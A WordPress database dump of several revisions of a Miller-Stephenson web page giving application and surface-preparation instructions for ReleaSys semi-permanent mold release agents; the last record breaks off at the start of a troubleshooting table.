INSERT INTO `wp_posts` VALUES (2702, 3, '2016-10-23 21:45:52', '2016-10-23 21:45:52', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<span style="font-size: 140%;"><strong>Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:\r\n<ol>\r\n 	<li> Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Spray 8-10 inches from the surface with approximately 50% overlap. When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film" and allowed to dry on the surface, failure to do so will dramatically effect performance. <em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n</ol>\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 21:45:52', '2016-10-23 21:45:52', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2703, 3, '2016-10-23 21:59:01', '2016-10-23 21:59:01', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:\r\n<ol>\r\n 	<li> Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Spray 8-10 inches from the surface with approximately 50% overlap. When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film" and allowed to dry on the surface, failure to do so will dramatically effect performance. <em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n</ol>\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-23 21:59:01', '2016-10-23 21:59:01', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2705, 3, '2016-10-24 12:30:07', '2016-10-24 12:30:07', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\nWhile semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has more dramatic effect on performance than other release agents. Therefore proper training and guidance is critical to maximize the effectiveness of semi-permanent mold release agents.  To this end Miller-Stephenson has generated a comprehensive guide for application\r\n\r\n<span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:\r\n<ol>\r\n 	<li> Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Spray 8-10 inches from the surface with approximately 50% overlap. When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film" and allowed to dry on the surface, failure to do so will dramatically effect performance. <em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n</ol>\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Solutions to Common Molding Issues', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 12:30:07', '2016-10-24 12:30:07', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2706, 3, '2016-10-24 13:01:02', '2016-10-24 13:01:02', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul>\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\nWhile semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.\r\n\r\n<span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span>\r\n\r\n<span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span>\r\n\r\nSemi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.\r\n\r\n<span style="text-decoration: underline;">Application to Mold Surface</span>\r\n\r\nMiller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:\r\n<ol>\r\n 	<li>Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li>When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<span style="text-decoration: underline;">Re-application</span>\r\n<ol>\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li>When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n&nbsp;\r\n\r\nFollow manufacturer’s guidelines for removing whatever type o frelease or coatings that are currently on the mold.Older molds that have significant buildup of releases, and molds that have been coated with paste wax, should be cleaned with heavy duty\r\n<div data-canvas-width="103.916">cleaner/strippers such as AXEL’s CW-10NC, followed by a warmwater wash, and then cleaned again with a good general purpose solvent cleaner,such asIt is always a good practiceto both water and solvent clean molds; this will insure removal ofwater-soluble contaminates that a solvent cleaner alone may notremove. A clean mold should be streak free and masking tape shouldadhere well to the surface.</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div data-canvas-width="370.56179999999995">The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>\r\n<div data-canvas-width="370.56179999999995"></div>\r\n<div data-canvas-width="370.56179999999995">Miller-Stephenson\'s ReleaSys semi-permanent release agents provide is  are reactive resin solutions designed to cross-link and cure on mold surfaces providing a durable and inert</div>\r\n<div data-canvas-width="320.06460000000004">release film. The mechanism by which these materials cure is either by exposure to atmosphere, temperature, or both. Depending on the</div>\r\n<div data-canvas-width="423.3332">particular semi-permanent mold release, these products may be applied and cured at ambient temperature, applied on warm molds,</div>\r\n<div data-canvas-width="151.65760000000006">or can, particularly in the case of many water-based products, require a heat cycle to cure. The cure profile of the particular semi-permanent mold release product impacts the way in which these materials should be handled. In all cases, care must be taken to insure that mold surfaces are totally free of contamination before applying the mold release and that adequate time is permitted for the release to cure before beginning to mold. Here then, are some helpful guidelines in handling this type of mold release.</div>', 'Mold Release Application Guide - Troubleshooting Guide', '', 'inherit', 'closed', 'closed', '', '2694-revision-v1', '', '', '2016-10-24 13:01:02', '2016-10-24 13:01:02', '', 2694, 'https://www.miller-stephenson.com/2694-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2707, 107, '2016-10-24 13:25:54', '2016-10-24 13:25:54', '', '', '', 'publish', 'closed', 'closed', '', '2707', '', '', '2016-10-24 13:25:54', '2016-10-24 13:25:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/2707/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2708, 3, '2016-10-24 13:42:51', '2016-10-24 13:42:51', '<div data-canvas-width="370.56179999999995">Semi-permanent mold release agents are state of the art release systems designed to provide superior durability, maximal number of releases per application, and minimal de-molding force. Miller-Stephenson has been at the forefront of developing the most advance release agents for the molding industry.  Our exclusive ReleaSys Semi-Permanent release agents represent the most technological advanced and refined release system available on the market. ReleaSys release agents provide greater operational efficiency by bonding to mold surfaces, creating a durable layer that is resistant to both chemical and mechanical attack. These products are offered in both low-odor, non-flammable solvent-based or water-based formulations.  Our product line offers the following benefits:</div>\r\n<div data-canvas-width="370.56179999999995">\r\n<ul style="text-align: justify;">\r\n 	<li>Very low transfer (contamination) to the molded part</li>\r\n 	<li>Excels at releasing difficult substrates from complex mold geometries</li>\r\n 	<li>High suitability for rubber-to-metal bonding</li>\r\n 	<li>Low levels of in-mold build-up/fouling</li>\r\n 	<li>Promotion of substrate flow (Rubber, Epoxy, Polyurethane, etc)</li>\r\n 	<li>Extremely high release-ease</li>\r\n 	<li>Many releases (high durability) between applications</li>\r\n 	<li>Various slip levels</li>\r\n 	<li>Superb release for all polymer types</li>\r\n 	<li>Applicability for all molding processes</li>\r\n</ul>\r\n<p style="text-align: justify;">While semi-permanent mold release agents offer superior performance and efficiency, their surface preparation and application technique have greater requirements. Failure to follow the correct method of preparation and application has a more dramatic effect on performance than other conventional release agents. Therefore proper training and guidance is critical to maximize the effectiveness, to this end Miller-Stephenson has generated a comprehensive mold release application guide and commonly observed issues to help aid our customers in applying ReleaSys.</p>\r\n<p style="text-align: justify;"><span style="font-size: 140%;"><strong>Mold Release Application Guide:\r\n</strong></span></p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;"><span style="font-size: 100%;">Surface-Preparation</span></span></p>\r\n<p style="text-align: justify;">Semi-permanent mold release agents require specific preparation of the molding surface in order to maximize surface adhesion, durability, and minimize transfer. <strong>The molds must be thoroughly cleaned, removal of all previous mold release agent or contamination is critical before application of ReleaSys.</strong> Prior to initial application of ReleaSys, Miller-Stephenson recommends mechanical cleaning with media blasting followed by cleaning with a good general purpose solvent or high-pH cleaning solution. Older molds that have significant buildup of releases, and/ or molds that have been coated with waxes, oils, etc should be cleaned with a heavy duty cleaner solvent like Miller-Stephenson\'s MS-557 or MS-552.  A good test is to use masking tape and test for surface adhesion, if the tape adheres to the mold surface than typically your cleaning has been successful.</p>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Application to Mold Surface</span></p>\r\n<p style="text-align: justify;">Miller-Stephenson\'s ReleaSys semi-permanents can be applied by three standard methods: hand-wiping, aerosolization via HVLP gun or aerosolization within a can. Miller-Stephenson strongly recommends application via aerosolization.  This method minimizes over-application and facilitates the development of a uniform,thin film on the molding surface. Miller-Stephenson sells aerosolized cans of its ReleaSys product line (ie: ReleaSys 82, 85, 88, and 89) which have been optimized to deliver consistent application.  Moreover our aerosol cans use a 100% nonflammable, quick drying,  and low odor formulation which enables applicators to have greater safety and lower exposure. Follow these steps when applying ReleaSys:</p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>Gentle agitate ReleaSys, avoiding high shear / high rpm mixing if using bulk and excessive shaking of the aerosol can. Set HVLP gun to appropriate pressure; typically starting pressure is &gt;40 psi in the airline, 8-10 psi at the gun, and ~2-4 psi at the outlet. Nozzles sizes can vary between 1.0mm to 1.8mm.  Spray 8-10 inches from the surface with approximately 50% overlap.</li>\r\n 	<li>When using solvent-based ReleaSys allow 2-3 minutes between coats and 15-20 minutes after the final coat to allow for a full cure at room temperature.  Miler-Stephenson recommends 2-3 coats to maximize durability and number or releases before re-application. Final cure times can be reduced at elevated temperatures. Water-based formulation should be applied to a hot mold (&gt;90 C) with 2-3 light coats followed by a brief cure time (2-3 minutes at &gt; 90 C). Regardless of applications method or carrier solvent, ReleaSys must be applied to the mold surface as a "wet film or wet coat" and allowed to dry on the surface, failure to do so will dramatically effect performance.</li>\r\n 	<li><em>NOTE: Cure time refers to the time required for the polymeric release agent to sufficiently cross-link and adhere to the mold surface. Allowing proper time for cross-linking is critical to performance, this process can be accelerated as a function of increased temperature.  Typically a single heat cycle of the mold is a sufficient means of acceleration.</em></li>\r\n</ol>\r\n<p style="text-align: justify;"><span style="text-decoration: underline;">Re-application</span></p>\r\n\r\n<ol style="text-align: justify;">\r\n 	<li>When release becomes hesitant, immediately reapply one coat of ReleaSys™ in the same manner as described previously. Spot touch-ups can also be done on known high wear or geometrically strained areas.</li>\r\n 	<li>When molding it is common for operators to use an HVLP gun to spray the entire mold and apply touch-up coats with the aerosol can.  The aerosol can allows for lighter spray volumes and uniform coverage, particularly in areas that are prone to de-molding issues.</li>\r\n</ol>\r\n<p style="text-align: justify;"><strong>Troubleshooting Guide</strong></p>\r\n\r\n<table style="height: 634px;" width="1068">\r\n<tbody>\r\n<tr>\r\n<td width="241"><span style="font-size: 120%;">           <span class="fancy-underline">Problem</span></span></td>\r\n<td style="text-align: justify;" width="517"><span style="font-size: 120%;">                                  <span 